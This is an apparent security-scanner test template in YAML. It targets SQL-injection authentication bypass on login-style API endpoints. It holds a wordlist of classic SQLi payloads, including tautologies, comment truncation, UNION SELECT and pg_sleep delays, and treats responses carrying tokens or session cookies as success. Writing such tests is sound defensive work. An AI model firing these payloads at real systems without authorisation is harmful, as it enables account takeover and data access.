---
id: BROKEN_AUTH_SQL_INJECTION
info:
  name: "Broken Authentication - SQL Injection"
  description: "Tests whether the application is vulnerable to authentication bypass through SQL injection."
  details: "This test injects SQL injection payloads into user parameters to check if the application processes them, potentially allowing authentication bypass, indicating a broken authentication vulnerability."
  impact: "Broken Authentication vulnerabilities can allow attackers to bypass authentication mechanisms, enumerate valid usernames, and gain unauthorized access to user accounts."
  category:
    name: NO_AUTH
    shortName: Broken Authentication
    displayName: Broken User Authentication (BUA)
  subCategory: BROKEN_AUTH_SQL_INJECTION
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
    - Authentication
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/"
    - "https://github.com/OWASP/API-Security/blob/master/editions/2023/en/0xa2-broken-authentication.md"
  cwe:
    - CWE-287
    - CWE-306
  cve:
    - CVE-2020-24008
    - CVE-2021-45901
    - CVE-2023-22501

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
  or:
    - url:
        contains_either:
          - login
          - signin
          - authenticate
          - auth
    - request_payload:
        for_one:
          key:
            regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$"
            extractMultiple: userKey
          value:
            extract: userVal
    - query_param:
        for_one:
          key:
            regex: ".*"
            extractMultiple: userKey
          value:
            extract: userVal
    - url:
        extract: urlVar
    - request_headers:
        for_one:
          key:
            regex: .*
            extract: userKey
          value:
            extract: userVal
  url:
    extract: urlVar

wordLists:
  sqlAuthBypassPayloads:
    - "' OR '1'='1"
    - "' OR 1=1--"
    - "admin'--"
    - "' OR '1'='1' /*"
    - "admin'/*"
    - "' OR 1=1#"
    - "' OR 1=1--"
    - "') OR ('1'='1')--"
    - "' UNION SELECT NULL, NULL--"
    - "' OR 'x'='x'--"
    - "1' OR '1'='1'--"
    - "admin' OR '1'='1'--"
    - "' OR 1=1; SELECT pg_sleep(5)--"
    - "1' UNION SELECT NULL, NULL, NULL--"
    - "admin' OR 1=1; SELECT pg_sleep(5)--"

execute:
  type: single
  requests:
    - req:
        - modify_body_param:
            ${userKey}: "${sqlAuthBypassPayloads}"
        - modify_query_param:
            ${userKey}: "${sqlAuthBypassPayloads}"

validate:
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - invalid credentials
      - authentication failed
      - Internal Server
      - Failed
      - Unauthorized
    or:
      - contains_either:
          - "token"
          - "access_token"
          - "refresh_token"
          - "session"
          - "sessionId"
          - "session_id"
          - "authToken"
          - "jwt"
          - "bearer"
      - contains_either:
          - "user"
          - "userId"
          - "user_id"
          - "email"
          - "username"
          - "profile"
          - "account"
          - "logged_in"
          - "authenticated"
          - "success"
      - response_headers:
          for_one:
            key:
              contains_either:
                - Set-Cookie
                - set-cookie
                - Authorization
                - authorization
